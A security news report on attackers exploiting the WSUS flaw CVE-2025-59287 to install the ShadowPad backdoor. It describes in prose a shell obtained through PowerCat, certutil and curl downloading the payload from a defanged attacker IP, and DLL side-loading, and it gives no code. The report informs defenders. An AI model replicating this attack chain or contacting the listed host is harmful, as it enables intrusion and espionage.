A recently patched, critical vulnerability in Microsoft Windows Server Update Services (WSUS), identified as CVE-2025-59287, is being actively exploited by malicious actors to install the sophisticated malware called ShadowPad. Security researchers at AhnLab Security Intelligence Center (ASEC) detailed the attack, noting that the threat actors specifically targeted publicly exposed Windows Servers with WSUS enabled, leveraging the flaw for their initial foothold. Following this, the attackers utilized the open-source PowerShell-based Netcat utility, PowerCat, to secure a system shell (CMD), which allowed them to download and execute ShadowPad using built-in Windows utilities like certutil and curl.
ShadowPad is a formidable, modular backdoor widely associated with Chinese state-sponsored hacking operations, often considered a successor to the notorious PlugX malware. Since its first appearance in 2015, it has evolved into a highly complex and effective tool for espionage. Security experts, like those at SentinelOne, have previously lauded ShadowPad as a “masterpiece of privately sold malware in Chinese espionage,” highlighting its advanced capabilities and significant role in state-level cyber operations.
The vulnerability at the heart of these attacks, CVE-2025-59287, is a critical deserialization flaw within WSUS that enables an attacker to achieve remote code execution with system privileges. Although Microsoft addressed this flaw last month, its proof-of-concept exploit code was quickly made public, leading to heavy weaponization and exploitation in the wild. Threat actors have been using it for various purposes, including gaining initial access, conducting reconnaissance, dropping legitimate tools like Velociraptor, and, in this documented case, compelling Windows utilities like curl.exe and certutil.exe to connect to an external server (149.28.78[.]189:42306) to download and deploy the ShadowPad payload.
To ensure its execution, ShadowPad employs a stealthy technique known as DLL side-loading, mirroring the execution method of its predecessor, PlugX. This involves exploiting a legitimate application binary—in this instance, ETDCtrlHelper.exe—to load a malicious, memory-resident dynamic-link library (ETDApix.dll) which then acts as a loader for the actual backdoor. This method helps the malware evade detection by masquerading its initial execution under a trusted application process.
Once successfully loaded, the malware initiates a core module responsible for decrypting and loading other malicious plugins embedded within the main shellcode directly into memory. Furthermore, ShadowPad is engineered with a variety of advanced anti-detection and persistence techniques designed to maintain a long-term presence on compromised systems while resisting removal efforts. The specific group responsible for these attacks has not yet been definitively identified or attributed to any known threat actor.
Reference:
